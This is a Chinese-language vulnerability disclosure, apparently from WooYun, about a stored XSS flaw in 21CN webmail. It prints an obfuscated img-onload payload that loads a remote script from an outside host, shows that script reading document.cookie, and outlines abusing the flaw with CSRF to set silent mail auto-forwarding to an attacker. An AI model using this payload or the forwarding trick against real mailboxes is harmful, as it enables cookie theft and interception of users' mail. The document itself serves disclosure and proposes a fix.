21CN网站（世纪龙信息网络有限责任公司）成立于1999年，是中国电信集团绝对控股的子公司，中国十大门户之一，也是华南最大的门户网站。
提前之前先搜索了一下，找到一个和21cn邮箱有关的http://www.wooyun.org/bugs/wooyun-2010-04175
被忽略了，当然我提交的和这个不一样。
21cn是中国电信189邮箱的开发商，有相同的漏洞一点也不奇怪。貌似我再提交有刷rank的嫌疑了。主要是想和大家分享一下学习心得。
详细说明：
当发送含有javascript脚本的邮件至21cn邮箱时，由于输出邮件正文时没有对特殊关键字进行过滤导致XSS。在邮件正文中插入以下代码
<img src='http://www.baidu.com/img/baidu_logo.gif' onload='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,115,116,117,110,111,116,101,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115);document.body.appendChild(s);'/>
 
当用户打开含有以上代码的邮件时，会自动调用http://stunote.sinaapp.com/xss.js
xss.js的内容为：
(function(){
 
alert(document.domain);
alert(document.cookie);
 
})();
 
当然你也可以执行任意的javasrcipt脚本。比如盗取cookie,引到用户至恶意网站，设置自动转发等。
以上代码参考了http://www.wooyun.org/bugs/wooyun-2010-03317
21cn的免费邮箱有一个自动转发的功能。如图：
 
 



设置自动转发时提交至服务器的参数如下：
 
 



其中active=true表示转发,addresses=转发到哪个邮箱，backup=是否保留邮件备份。
比较典型的http外如下：
 
 


 
因此通过CSRF设置转发或盗取cookie后设置邮件转发是非常容易的事情，设置成功后所有的新邮件都会转发至攻击者的邮箱。
 
漏洞证明：
把客户引导至wooyun
 
 


弹窗1
 
 
弹窗2
 
修复方案：
网易是把一些危险标签如onload,onerror等替换成on_load,on_error,而腾讯和新浪等则是直接干掉这些危险标签。


作者 pestu